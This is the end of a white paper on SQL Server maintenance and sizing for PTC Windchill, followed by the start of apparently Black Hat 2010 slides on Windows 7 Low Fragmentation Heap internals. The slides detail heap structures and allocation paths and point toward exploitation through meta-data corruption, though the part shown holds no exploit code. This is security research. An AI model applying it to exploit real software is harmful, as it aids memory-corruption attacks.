the current record, so there is no need to do disk seeks to find the record, resulting in excellent retrieval performance. - Only one clustered index may exist per table. - **Non-clustered index**: With a non-clustered index, the index refers to the clustered index, similar to how an index of a book refers to the page where a term appears. **Missing Indexes** Selecting indexes is an art that must balance the cost of index maintenance versus the performance gain by having an index. PTC has built indexes based on anticipated usage, but actual usage is often different. Frequently seeing full table scans is an indicator of a missing index. The following query returns the queries with the longest execution time and most frequent execution, which can help you identify where adding an index might be useful: ``` ``` --- SELECT top 100 * FROM (SELECT OBJECT_NAME(s2.objectid) as ObjectName, DB_Name(s2.dbId) as DatabaseName, execution_count, total_worker_time, total_worker_time / execution_count as Average_WorkerTime, (SELECT TOP 1 SUBSTRING(s2.text, statement_start_offset / 2 + 1, (CASE WHEN statement_end_offset = -1 THEN (LEN(CONVERT(nvarchar(max), s2.text)) * 2) ELSE statement_end_offset END) - statement_start_offset) / 2 + 1) AS sql_statement, plan_generation_num, last_execution_time, last_worker_time, min_worker_time, total_physical_reads, last_physical_reads, min_physical_reads, max_physical_reads, total_logical_writes, last_logical_writes, min_logical_writes, max_logical_writes FROM sys.dm_exec_query_stats AS s1 CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS s2) WHERE DatabaseName = 'wcAdmin' AND ObjectName is not null AND sql_statement not like '%@%' AND sql_statement not like '%#%' ORDER BY Average_WorkerTime Desc, execution_count Desc Tools to Help Maintain SQL Server Performance PTC recommends the installation and use of the following free Microsoft and community products to help maintain the performance of your Windchill system: - SQL Server 2005 Best Practices Analyzer - SQL Server 2005 Performance Dashboard - SQL Server Health and History (SQLH2) Tool - Performance Analysis of Logs (PAL) tool For information about using these tools, see the Microsoft and PTC Alliance Web page for “Best Maintenance Tools for PTC Windchill on Microsoft SQL Server 2005,” which walks you through building additional indexes to increase performance. Capacity Planning and Monitoring Database systems are not “install and forget” systems because databases constantly grow. A new customer may result in rapid growth of Windchill, for example. Thus, it is essential to do capacity planning and monitoring of your Windchill system. Begin by recording the following items available via Performance Monitor, under SQL Server: Databases object, daily and then weekly into Excel: - Data File Size - Percentage Log Used These numbers will allow you to track growth trends and ensure that adequate disk space is always available. **Common DBCC Commands** SQL Server has a useful set of Database Console Commands (dbcc) that provide access to low-level information about the database for remediation of low-level issues. Dbcc can cause blocking problems so use it when there is the least load on the database. Some of the most useful commands are: - **DBCC CHECKDB** - Checks database integrity and displays advice on how to fix found problems - If running this command affects user performance, trace flag 2528 should be set: `(DBCC TRACEON (2528, -1))` - **DBCC CHECKCONSTRAINTS** - Checks table constraints; not done by CHECKDB - **DBCC SQLPERF(LOGSPACE)** - Lists the states of the logs - **DBCC SHRINKDATABASE('wcAdmin', NOTRUNCATE)** - Moves the data to the front of the file - You rarely need to run this, but if you do run it, rebuild indexes immediately afterward - **DBCC OPENTRAN** - Checks if there are any open transactions; an open transaction can interfere with the normal operation of the transaction log - **DBCC USEROPTIONS** - Lists the options in effect; occasionally, gremlins may change the values you have set, resulting in a variety of problems. The expected values are shown in Figure 6. For more information, see [DBCC Commands](#) or [DBCC (Transact-SQL)](##). Figure 6 - Reviewing DBCC USEROPTIONS <table> <thead> <tr> <th>Set Option</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>tasksize</td> <td>2147483647</td> </tr> <tr> <td>language</td> <td>user_english</td> </tr> <tr> <td>datarow</td> <td>mdy</td> </tr> <tr> <td>datafetch</td> <td>7</td> </tr> <tr> <td>lock_timeout</td> <td>-1</td> </tr> <tr> <td>quoted_identifier</td> <td>SET</td> </tr> <tr> <td>arithabot</td> <td>SET</td> </tr> <tr> <td>ansi_null_dff_on</td> <td>SET</td> </tr> <tr> <td>ansi_warnings</td> <td>SET</td> </tr> <tr> <td>ansi_padding</td> <td>SET</td> </tr> <tr> <td>ansi_nulls</td> <td>SET</td> </tr> <tr> <td>concat_nulls</td> <td>SET</td> </tr> <tr> <td>isolation_level</td> <td>read_committed_snapshot</td> </tr> </tbody> </table> Common Mistakes Some SQL Server activities that sound logical do not do what you expect and can cause problems. Here are some general database misconceptions: - **Do not shrink the database** – Although it sounds like something you should do, do not shrink the database. This action will often result in index fragmentation and worse performance, as well as SQL Server having to reinitialize the file space when it grows. - **Performing Update Statistics after rebuiding indexes** – This operation automatically occurs as part of the rebuilding process. - **Rebuilding indexes immediately after doing a full backup** – Rebuilding indexes should occur immediately before doing a full backup so that the rebuilding log is never part of a transaction log backup. Conclusion The following points sum up the best practices described in this paper: - **Sizing and configuring the hardware:** - Use adequate cores - Ensure adequate memory - Use appropriate physical drives and controllers - Make sure write caching is turned off - Ensure data redundancy of logical drives - Use sufficient logical drives to avoid contention issues - Perform appropriate assignment and sizing of filegroups to logical drives - **Maintaining the database:** - Perform at least weekly full backups - Reorganize or rebuild indexes weekly - Use the optimal fill factor for the index key length - Add missing indexes that will improve performance - Verify that default settings have not been changed Monitoring performance: - Use tools to speed regular reviews - Track database and log growth Further details on drive configuration and maintenance tasks and tools are available in the MSDN blog about PTC Windchill on SQL Server as well as in two companion white papers available on the Microsoft and PTC Alliance Web page: - Best Drive Configuration Practices for PTC Windchill on Microsoft SQL Server - Best Maintenance Tools for PTC Windchill on Microsoft SQL Server 2005 Links for Further Information PTC Windchill - Microsoft SQL Server: Improved Performance for PTC Windchill - Windchill and Pro/INTRALINK 9.0 and 9.1 Server Hardware Sizing Guidelines - Microsoft Windows Platform SQL Server information can be found in Books Online: - SQL Server 2008 Books Online - SQL Server 2005 Books Online SQL Server Books Online also includes best practice information in the following articles: - Best Practices for Replication Administration - Replication Security Best Practices - Best Practices for Recovering a Database to a Specific Recovery Point See the SQL Server Best Practices portal for technical white papers, the SQL Server Best Practices Toolbox, Top 10 Lists, and other resources. Following is a list of technical white papers that were tested and validated by the SQL Server development team. These can help you learn more about specific SQL Server topics. - A Quick Look at Serial ATA (SATA) Disk Performance - Best practices for operational excellence - Best Practices for Running SQL Server on Computers That Have More Than 64 CPUs - Best Practices for Semantic Data Modeling for Performance and Scalability - Checklist: SQL Server Performance - Checksum Problems, Choosing the Correct Recovery Model and More - Comparing Tables Organized with Clustered Indexes versus Heaps - Database Mirroring and Log Shipping Working Together - Database Mirroring Best Practices and Performance Considerations - Database Mirroring in SQL Server 2005 - Database Snapshot Performance Considerations Under I/O-Intensive Workloads - DBCC SHOWCONTIG Improvements and Comparison between SQL Server 2000 and SQL Server 2005 - Description of using disk drive caches with SQL Server that every database administrator should know - Disk Partition Alignment Best Practices for SQL Server - FLASH Disk Opportunity for Server-Applications - How to mirror the system and boot partition (RAID1) in Windows Server 2003 - How to use the SQLIOSim utility to simulate SQL Server activity on a disk subsystem - How To: Use SQL Profiler - Identifying and Resolving MDX Query Performance Bottlenecks in SQL Server 2005 Analysis Services - Implementing Application Failover with Database Mirroring - Improving SQL Server Performance - Microsoft SQL Server 2005 Tuning Tips for PeopleSoft 8.x - Microsoft SQL Server Database Engine Input/Output Requirements - Microsoft SQL Server I/O Basics (2005) - Microsoft SQL Server I/O subsystem requirements for the Temp Db database - Monitor and troubleshoot storage performance - Partial Database Availability - Performance of WD 250GB SATA Drives + 3ware Controller - Physical Database Storage Design - Precision Considerations for Analysis Services Users - Pre-Configuration Database Optimizations - Pre-Deployment I/O Best Practices - RML Utilities for SQL Server (x64) - SQL Server 2005 Deployment Guidance for Web Hosting Environments - SQL Server 2005 Performance Dashboard Reports - SQL Server 2005 Security Best Practices - Operational and Administrative Tasks - SQL Server 2005 Waits and Queues - SQL Server 7.0, SQL Server 2000, and SQL Server 2005 logging and data storage algorithms extend data reliability - SQL Server Best Practices - SQL Server Best Practices Article - SQL Server Health and History Tool (SQLH2) - SQL Server Replication: Providing High Availability Using Database Mirroring • SQLIO Disk Subsystem Benchmark Tool • Storage Top 10 Best Practices • Support WebCast: How to Effectively Use SQL Server Profiler • Technical Note #28: Common QA for deploying SQL Server ... • TEMP DB Capacity Planning and Concurrency Considerations for Index Create and Rebuild • Top Tips for Effective Database Maintenance • Troubleshooting Performance Problems in SQL Server 2005 • Uncover Hidden Data to Optimize Application Performance • Understanding Logging and Recovery in SQL Server • Understanding SQL Server Backups Bibliography • SQL Server MVP Deep Dives (Manning, 2010), Paul Nielsen, Kalen Delaney, et al. • Inside Microsoft SQL Server™ 2005: The Storage Engine (Microsoft Press, 2006), Kalen Delaney • Professional SQL Server 2005 Administration (Wiley, 2006), Brian Knight, Ketan Patel, et al. • SQL Server 2005 Bible (Wiley, 2006), Paul Nielsen Appendix: Hardware Sizing Guide for Windchill 9.1 and SQL Server 2005 Following are guidelines for determining server requirements for both the application tier and the database tier on a Windows Server platform for a typical Windchill PDMLink, Windchill ProjectLink, or Pro/INTRALINK 9.0 or 9.1 installation that uses SQL Server 2005 as the database platform. These guidelines build upon Table 2 in “Windchill and Pro/INTRALINK 9.0 and 9.1 Server Hardware Sizing Guidelines – Microsoft Windows Platform.” Table A lists the required number of CPU cores (or sockets) and the amount of RAM for a database tier running Microsoft SQL Server 2005, based on the weighted number of active users. (See the PTC guidelines for the definition of Active Users.) Table A uses the term “core” to refer to a single core. The recommendations do not refer to the number of dual-core or quad-core processors placed in the motherboard sockets. Windows Server 2008 licensing is dependent on the number of sockets and not the number of cores. A Windows Server 2008 Standard Edition will support only 4 cores if the CPUs are single core or 16 cores if the CPUs are quad core. Do not count hyper-threading cores as two (2) cores; common SQL Server practice is to disable the hyper-threading cores. Enabling hyper-threading results in a maximum theoretical benefit of around 20% more throughput. Table A - Database Server Sizing for Windchill 9.0 and 9.1 <table> <thead> <tr> <th>Weighted Number of Active Users</th> <th>Required Number of Cores</th> <th>Required Amount of RAM (GB)</th> <th>Windows Server 2008 Edition (Cores in Socket)(^{23})</th> <th>Windows Server 2003 Edition(^{24})</th> </tr> </thead> <tbody> <tr> <td>10</td> <td>1</td> <td>2</td> <td>Foundation</td> <td>Standard</td> </tr> <tr> <td>25</td> <td>1</td> <td>4</td> <td>Foundation</td> <td>Standard</td> </tr> <tr> <td>50</td> <td>2</td> <td>2/4</td> <td>Foundation (Dual)</td> <td>Standard</td> </tr> <tr> <td>100</td> <td>2</td> <td>8</td> <td>Foundation (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>200</td> <td>2</td> <td>8</td> <td>Foundation (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>300</td> <td>2</td> <td>8</td> <td>Foundation (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>400</td> <td>3</td> <td>8</td> <td>Foundation (Quad)</td> <td>Enterprise</td> </tr> <tr> <td>500</td> <td>3</td> <td>8</td> <td>Foundation (Quad)</td> <td>Enterprise</td> </tr> <tr> <td>600</td> <td>4</td> <td>12</td> <td>Standard</td> <td>Enterprise</td> </tr> <tr> <td>700</td> <td>4</td> <td>12</td> <td>Standard</td> <td>Enterprise</td> </tr> <tr> <td>800</td> <td>5</td> <td>12</td> <td>Standard (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>900</td> <td>5</td> <td>12</td> <td>Standard (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>1,000</td> <td>6</td> <td>16</td> <td>Standard (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>1,200</td> <td>7</td> <td>16</td> <td>Standard (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>1,500</td> <td>8</td> <td>16</td> <td>Standard (Dual)</td> <td>Enterprise</td> </tr> <tr> <td>2,000</td> <td>12</td> <td>20</td> <td>Standard (Quad)</td> <td>Datacenter</td> </tr> <tr> <td>2,500</td> <td>14</td> <td>24</td> <td>Standard (Quad)</td> <td>Datacenter</td> </tr> <tr> <td>3,000</td> <td>17</td> <td>32</td> <td>Enterprise (Dual)</td> <td>Datacenter</td> </tr> <tr> <td>3,500</td> <td>20</td> <td>32</td> <td>Enterprise (Quad)</td> <td>Datacenter</td> </tr> <tr> <td>4,000</td> <td>23</td> <td>32</td> <td>Enterprise (Quad)</td> <td>Datacenter</td> </tr> <tr> <td>4,500</td> <td>25</td> <td>32</td> <td>Enterprise (Quad)</td> <td>Datacenter</td> </tr> <tr> <td>5,000</td> <td>28</td> <td>32</td> <td>Enterprise (Quad)</td> <td>Datacenter</td> </tr> </tbody> </table> * If the weighted number of active users falls between two values, round up. ### Table B - Number of Physical Files in the Tempdb Filegroup <table> <thead> <tr> <th>Weighted Number of Active Users</th> <th>Number of Tempdb Files</th> </tr> </thead> <tbody> <tr> <td>10</td> <td>1</td> </tr> <tr> <td>25</td> <td>1</td> </tr> <tr> <td>50</td> <td>2</td> </tr> <tr> <td>100</td> <td>2</td> </tr> <tr> <td>200</td> <td>2</td> </tr> <tr> <td>300</td> <td>2</td> </tr> <tr> <td>400</td> <td>3</td> </tr> <tr> <td>500</td> <td>3</td> </tr> <tr> <td>600</td> <td>4</td> </tr> <tr> <td>700</td> <td>4</td> </tr> <tr> <td>800</td> <td>5</td> </tr> <tr> <td>900</td> <td>5</td> </tr> <tr> <td>1,000</td> <td>6</td> </tr> <tr> <td>1,200</td> <td>7</td> </tr> <tr> <td>1,500</td> <td>8</td> </tr> <tr> <td>2,000</td> <td>12</td> </tr> <tr> <td>2,500</td> <td>14</td> </tr> <tr> <td>3,000</td> <td>17</td> </tr> <tr> <td>3,500</td> <td>20</td> </tr> <tr> <td>4,000</td> <td>23</td> </tr> <tr> <td>4,500</td> <td>25</td> </tr> <tr> <td>5,000</td> <td>28</td> </tr> </tbody> </table>
{"Source-Url": "http://www.lassesen.com/msdn/Best-Practices-PTC-Windchill-on-SQL-Server.pdf", "len_cl100k_base": 16035, "olmocr-version": "0.1.50", "pdf-total-pages": 35, "total-fallback-pages": 0, "total-input-tokens": 99673, "total-output-tokens": 17266, "length": "2e13", "weborganizer": {"__label__adult": 0.0004470348358154297, "__label__art_design": 0.0006079673767089844, "__label__crime_law": 0.0003609657287597656, "__label__education_jobs": 0.0031948089599609375, "__label__entertainment": 0.00023734569549560547, "__label__fashion_beauty": 0.0002256631851196289, "__label__finance_business": 0.0069427490234375, "__label__food_dining": 0.0004208087921142578, "__label__games": 0.0011072158813476562, "__label__hardware": 0.005672454833984375, "__label__health": 0.0003662109375, "__label__history": 0.0005397796630859375, "__label__home_hobbies": 0.00029659271240234375, "__label__industrial": 0.0030956268310546875, "__label__literature": 0.00036263465881347656, "__label__politics": 0.0004203319549560547, "__label__religion": 0.0006098747253417969, "__label__science_tech": 0.17822265625, "__label__social_life": 0.00010228157043457033, "__label__software": 0.1734619140625, "__label__software_dev": 0.6220703125, "__label__sports_fitness": 0.00024235248565673828, "__label__transportation": 0.0007834434509277344, "__label__travel": 0.0002853870391845703}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 74854, 0.02389]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 74854, 0.19115]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 74854, 0.78862]], "google_gemma-3-12b-it_contains_pii": [[0, 1413, false], [1413, 2981, null], [2981, 7811, null], [7811, 10229, null], [10229, 13146, null], [13146, 16180, null], [16180, 19047, null], [19047, 21649, null], [21649, 24469, null], [24469, 27011, null], [27011, 28450, null], [28450, 31013, null], [31013, 32527, null], [32527, 32527, null], [32527, 35207, null], [35207, 37753, null], [37753, 40010, null], [40010, 42416, null], [42416, 44395, null], [44395, 46613, null], [46613, 49562, null], [49562, 51309, null], [51309, 52904, null], [52904, 53480, null], [53480, 54129, null], [54129, 56293, null], [56293, 58215, null], [58215, 59755, null], [59755, 61986, null], [61986, 64068, null], [64068, 66036, null], [66036, 67016, null], [67016, 68392, null], [68392, 73304, null], [73304, 74854, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1413, true], [1413, 2981, null], [2981, 7811, null], [7811, 10229, null], [10229, 13146, null], [13146, 16180, null], [16180, 19047, null], [19047, 21649, null], [21649, 24469, null], [24469, 27011, null], [27011, 28450, null], [28450, 31013, null], [31013, 32527, null], [32527, 32527, null], [32527, 35207, null], [35207, 37753, null], [37753, 40010, null], [40010, 42416, null], [42416, 44395, null], [44395, 46613, null], [46613, 49562, null], [49562, 51309, null], [51309, 52904, null], [52904, 53480, null], [53480, 54129, null], [54129, 56293, null], [56293, 58215, null], [58215, 59755, null], [59755, 61986, null], [61986, 64068, null], [64068, 66036, null], [66036, 67016, null], [67016, 68392, null], [68392, 73304, null], [73304, 74854, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 74854, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 74854, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 74854, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 74854, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 74854, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 74854, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 74854, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 74854, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 74854, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 74854, null]], "pdf_page_numbers": [[0, 1413, 1], [1413, 2981, 2], [2981, 7811, 3], [7811, 10229, 4], [10229, 13146, 5], [13146, 16180, 6], [16180, 19047, 7], [19047, 21649, 8], [21649, 24469, 9], [24469, 27011, 10], [27011, 28450, 11], [28450, 31013, 12], [31013, 32527, 13], [32527, 32527, 14], [32527, 35207, 15], [35207, 37753, 16], [37753, 40010, 17], [40010, 42416, 18], [42416, 44395, 19], [44395, 46613, 20], [46613, 49562, 21], [49562, 51309, 22], [51309, 52904, 23], [52904, 53480, 24], [53480, 54129, 25], [54129, 56293, 26], [56293, 58215, 27], [58215, 59755, 28], [59755, 61986, 29], [61986, 64068, 30], [64068, 66036, 31], [66036, 67016, 32], [67016, 68392, 33], [68392, 73304, 34], [73304, 74854, 35]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 74854, 0.23043]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
cb7d334de63ec56c8617edf432d8b9243946d455
Understanding the Low Fragmentation Heap Chris Valasek, Researcher, X-Force Advanced R&D cvalasek@gmail.com / @nudehaberdasher Blackhat USA 2010 Introduction “What. Are. You……?” Introduction • Much has changed since Windows XP • Data structures have been added and altered • Memory management is now a bit more complex • New security measures are in place to prevent meta-data corruption • Heap determinism is worth more than it used to be • Meta-data corruption isn’t entirely dead The Beer List • Core data structures • _HEAP • _LFH_HEAP • _HEAP_LIST_LOOKUP • Architecture • FreeLists • Core Algorithms • Back-end allocation (RtlpAllocateHeap) • Front-end allocation (RtlpLowFragHeapAllocFromContext) • Back-end de-allocation (RtlpFreeHeap) • Front-end de-allocation (RtlpLowFragHeapFree) • Tactics • Heap determinism • LFH specific heap manipulation • Exploitation • Ben Hawkes #1 • FreeEntry Offset • Observations Prerequisites • All pseudo-code and data structures are taken from Windows 7 ntdll.dll version 6.1.7600.16385 (32-bit) • Yikes! I think there is a new one… • Block/Blocks = 8-bytes • Chunk = contiguous piece of memory measured in blocks or bytes • HeapBase = _HEAP pointer • LFH = Low Fragmentation Heap • BlocksIndex = _HEAP_LIST_LOOKUP structure • 1st BlocksIndex manages chunks from 8 to 1024 bytes • ListHint[0x7F] = Chunks >= 0x7F blocks • 2nd BlocksIndex manages chunks from 1024 bytes to 16k bytes • ListHint[0x77F] = Chunks >= 0x7FF blocks • Bucket/HeapBucket = _HEAP_BUCKET structure used as size/offset reference • HeapBin/UserBlocks = Actually memory the LFH uses to fulfill requests Core Data Structures “Ntdll changed, surprisingly I didn’t quit” ### _HEAP (HeapBase) <table> <thead> <tr> <th>Offset</th> <th>Field</th> <th>Type</th> </tr> </thead> <tbody> <tr> <td>+0x04c</td> <td>EncodeFlagMask</td> <td>Uint4B</td> </tr> <tr> <td>+0x050</td> <td>Encoding</td> <td>_HEAP_ENTRY</td> </tr> <tr> <td>+0x0b8</td> <td>BlocksIndex</td> <td>Ptr32 Void</td> </tr> <tr> <td>+0x0c4</td> <td>FreeLists</td> <td>_LIST_ENTRY</td> </tr> <tr> <td>+0x0d4</td> <td>FrontEndHeap</td> <td>Ptr32 Void</td> </tr> <tr> <td>+0x0da</td> <td>FrontEndHeapType</td> <td>UChar</td> </tr> </tbody> </table> - **EncodeFlagMask** – A value that is used to determine if a heap chunk header is encoded. This value is initially set to 0x100000 by `RtlpCreateHeapEncoding()` in `RtlCreateHeap()`. - **Encoding** – Used in an XOR operation to encode the chunk headers, preventing predictable meta-data corruption. - **BlocksIndex** – This is a `_HEAP_LIST_LOOKUP` structure that is used for a variety of purposes. Due to its importance, it will be discussed in greater detail in the next slide. - **FreeLists** – A special linked-list that contains pointers to ALL of the free chunks for this heap. It can almost be thought of as a heap cache, but for chunks of every size (and no single associated bitmap). - **FrontEndHeapType** – An integer is initially set to 0x0, and is subsequently assigned a value of 0x2, indicating the use of a LFH. Note: Windows 7 does not actually have support for using Lookaside Lists. - **FrontEndHeap** – A pointer to the associated front-end heap. This will either be NULL or a pointer to a _LFH_HEAP structure when running under Windows 7. ### _HEAP_LIST_LOOKUP (HeapBase->BlocksIndex) <table> <thead> <tr> <th>Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>0x000</td> <td>ExtendedLookup : Ptr32 _HEAP_LIST_LOOK培</td> </tr> <tr> <td>0x004</td> <td>ArraySize : Uint4B</td> </tr> <tr> <td>0x010</td> <td>OutOfRangeItems : Uint4B</td> </tr> <tr> <td>0x014</td> <td>BaseIndex : Uint4B</td> </tr> <tr> <td>0x018</td> <td>ListHead : Ptr32 _LIST_ENTRY</td> </tr> <tr> <td>0x01c</td> <td>ListsInUseUlong : Ptr32 Uint4B</td> </tr> <tr> <td>0x020</td> <td>ListHints : Ptr32 Ptr32 _LIST_ENTRY</td> </tr> </tbody> </table> - **ExtendedLookup** - A pointer to the next _HEAP_LIST_LOOK培 structure. The value is NULL if there is no ExtendedLookup. - **ArraySize** – The highest block size that this structure will track, otherwise storing it in a special ListHint. The only two sizes that Windows 7 currently uses are 0x80 and 0x800. - **OutOfRangeItems** – This 4-byte value counts the number items in the FreeList[0]-like structure. Each _HEAP_LIST_LOOK培 tracks free chunks larger than ArraySize-1 in ListHint[ArraySize-BaselIndex-1]. - **BaseIndex** – Used to find the relative offset into the ListHints array, since each _HEAP_LIST_LOOK培 is designated for a certain size. For example, the BaseIndex for 1st BlockIndex would be 0x0 because it manages lists for chunks from 0x0 – 0x80, while the 2nd BlockIndex would have a BaseIndex of 0x80. - **ListHead** – This points to the same location as HeapBase->FreeLists, which is a linked list of all the free chunks available to a heap. - **ListsInUseUlong** – Formally known as the FreeListInUseBitmap, this 4-byte integer is an optimization used to determine which ListHints have available chunks. - **ListHints** – Also known as FreeLists, these linked lists provide pointers to free chunks of memory, while also serving another purpose. If the LFH is enabled for a given Bucket size, then the blink of a specifically sized ListHint/FreeList will contain the address of a _HEAP_BUCKET + 1. ListEntry – A linked list of _LFH_BLOCK_ZONE structures. FreePointer – This will hold a pointer to memory that can be used by a _HEAP_SUBSEGMENT. Limit – The last _LFH_BLOCK_ZONE structure in the list. When this value is reached or exceeded, the back-end heap will be used to create more _LFH_BLOCK_ZONE structures. _LFH_HEAP (HeapBase->FrontEndHeap) - **Heap** – A pointer to the parent heap of this LFH. - **Buckets** – An array of 0x4 byte data structures that are used for the sole purpose of keeping track of indices and sizes. This is why the term **Bin** will be used to describe the area of memory used to fulfill request for a certain **Bucket** size. - **LocalData** – This is a pointer to a large data structure which holds information about each **SubSegment**. See _HEAP_LOCAL_DATA for more information. <table> <thead> <tr> <th>Address Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>+0x024 Heap</td> <td>Ptr32 Void</td> </tr> <tr> <td>+0x110 Buckets</td> <td>[128] _HEAP_BUCKET</td> </tr> <tr> <td>+0x310 LocalData</td> <td>[1] _HEAP_LOCAL_DATA</td> </tr> </tbody> </table> ## _HEAP_LOCAL_DATA (HeapBase->FrontEndHeap->LocalData) <table> <thead> <tr> <th>Offsets</th> <th>Descriptions</th> </tr> </thead> <tbody> <tr> <td>+0x00c LowFragHeap : P:rt32 LFH HEAP</td> <td></td> </tr> <tr> <td>+0x018 SegmentInfo : [128] HEAP_LOCAL_SEGMENT_INFO</td> <td></td> </tr> </tbody> </table> - **LowFragHeap** – The Low Fragmentation heap associated with this structure. - **SegmentInfo** – An array of _HEAP_LOCAL_SEGMENT_INFO structures representing all available sizes for this LFH. This structure type will be discussed in later sections. **_HEAP_LOCAL_SEGMENT_INFO_** (HeapBase->FrontEndHeap->LocalData->SegmentInfo[]) <table> <thead> <tr> <th>Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>+0x000</td> <td>Hint : Ptr32 _HEAP_SUBSEGMENT</td> </tr> <tr> <td>+0x004</td> <td>ActiveSubsegment : Ptr32 _HEAP_SUBSEGMENT</td> </tr> <tr> <td>+0x058</td> <td>LocalData : Ptr32 _HEAP_LOCAL_DATA</td> </tr> <tr> <td>+0x060</td> <td>BucketIndex : Uint2B</td> </tr> </tbody> </table> - **Hint** – This **SubSegment** is only set when the LFH frees a chunk which it is managing. If a chunk is never freed, this value will always be **NULL**. - **ActiveSubsegment** – The **SubSegment** used for most memory requests. While initially NULL, it is set on the **first** allocation for a specific size. - **LocalData** – The **_HEAP_LOCAL_DATA** structure associated with this structure. - **BucketIndex** – Each **SegmentInfo** object is related to a certain **Bucket** size (or Index). **HEAP_SUBSEGMENT** (HeapBase->FrontEndHeap->LocalData->SegmentInfo[]->Hint,ActiveSubsegment,CachedItems) <table> <thead> <tr> <th>Address Offset</th> <th>Field Description</th> </tr> </thead> <tbody> <tr> <td>+0x000</td> <td>LocalInfo – The _HEAP_LOCAL_SEGMENT_INFO structure associated with this structure.</td> </tr> <tr> <td>+0x004</td> <td>UserBlocks – A _HEAP_USERDATA_HEADER structure coupled with this SubSegment which holds a large chunk of memory split into n-number of chunks.</td> </tr> <tr> <td>+0x008</td> <td>AggregateExchg – An _INTERLOCK_SEQ structure used to keep track of the current Offset and Depth.</td> </tr> <tr> <td>+0x016</td> <td>SizeIndex – The _HEAP_BUCKET SizeIndex for this SubSegment.</td> </tr> <tr> <td>+0x000 LocalInfo</td> <td>Ptr32 _HEAP_LOCAL_SEGMENT_INFO</td> </tr> <tr> <td>+0x004 UserBlocks</td> <td>Ptr32 _HEAP_USERDATA_HEADER</td> </tr> <tr> <td>+0x008 AggregateExchg</td> <td>_INTERLOCK_SEQ</td> </tr> <tr> <td>+0x016 SizeIndex</td> <td>UChar</td> </tr> </tbody> </table> ### _HEAP_USERDATA_HEADER (HeapBase->FrontEndHeap->LocalData->SegmentInfo[]->Hint,ActiveSubsegment,CachedItems->UserBlocks) <table> <thead> <tr> <th>Offset</th> <th>Name</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>+0x000</td> <td>SubSegment</td> <td>Ptr32 _HEAP_SUBSEGMENT</td> </tr> <tr> <td>+0x004</td> <td>Reserved</td> <td>Ptr32 Void</td> </tr> <tr> <td>+0x008</td> <td>SizeIndex</td> <td>Uint4B</td> </tr> <tr> <td>+0x00c</td> <td>Signature</td> <td>Uint4</td> </tr> <tr> <td>+0x010</td> <td>User Writable Data</td> <td>XXXX</td> </tr> </tbody> </table> **INTERLOCK_SEQ** (HeapBase->FrontEndHeap->LocalData->SegmentInfo[]->Hint,ActiveSubsegment,CachedItems->AggregateExchg) - **Depth** – A counter that keeps track of how many chunks are left in a UserBlock. This number is incremented on a free and decremented on an allocation. Its value is initialized to the size of UserBlock divided by the HeapBucket size. - **FreeEntryOffset** – This 2-byte integer holds a value, when added to the address of the _HEAP_USERDATA_HEADER, results in a pointer to the next location for freeing or allocating memory. This value is represented in blocks (0x8 byte chunks) and is initialized to 0x2, as sizeof(_HEAP_USERDATA_HEADER) is 0x10. [0x2 * 0x8 == 0x10]. - **OffsetAndDepth** – Since both Depth and FreeEntryOffset are 2-bytes, are combined into this single 4-byte value. _HEAP_ENTRY (Chunk Header) - **Size** – The size, in blocks, of the chunk. This includes the _HEAP_ENTRY itself - **Flags** – Flags denoting the state of this heap chunk. Some examples are FREE or BUSY - **SmallTagIndex** – This value will hold the XOR’ed checksum of the first three bytes of the _HEAP_ENTRY - **UnusedBytes/ExtendedBlockSignature** – A value used to hold the unused bytes or a byte indicating the state of the chunk being managed by the LFH. Architecture “The winner of the BIG award is…” Once upon a time there were dedicated FreeLists which were terminated with pointers to sentinel nodes. Empty lists would contain a Flink and Blink pointing to itself. Win7 FreeLists - The concept of dedicated FreeLists have gone away. FreeList or ListHints will point to a location within Heap->FreeLists. - They Terminate by pointing to &HeapBase->FreeLists. Empty lists will be NULL or contain information used by the LFH. - Only Heap->FreeLists initialized to have Flink/Blink pointing to itself. - Chunks >= ArraySize-1 will be tracked in BlocksIndex->ListHints[ArraySize-BaseIndex-1] - If the LFH is enabled for a specific Bucket then the ListHint->Blink will contain the address of a _HEAP_BUCKET + 1. Otherwise, ListHint->Blink can contain a counter used to enable the LFH for that specific _HEAP_BUCKET. - LFH can manage chunks from 8-16k bytes. - FreeLists can track 16k+ byte chunks, but will not use the LFH. Circular Organization of Chunk Headers (COCHs) Algorithms: Allocation "@hzon Do you remember any of the stuff we did last year?" Alignment • **RtlAllocateHeap: Part I** • It will round the size to be 8-byte aligned then find the appropriate BlocksIndex structure to service this request. Using the *FreeList[0]* like structure if it cannot service the request. ```c if(Size == 0x0) Size = 0x1; //ensure that this number is 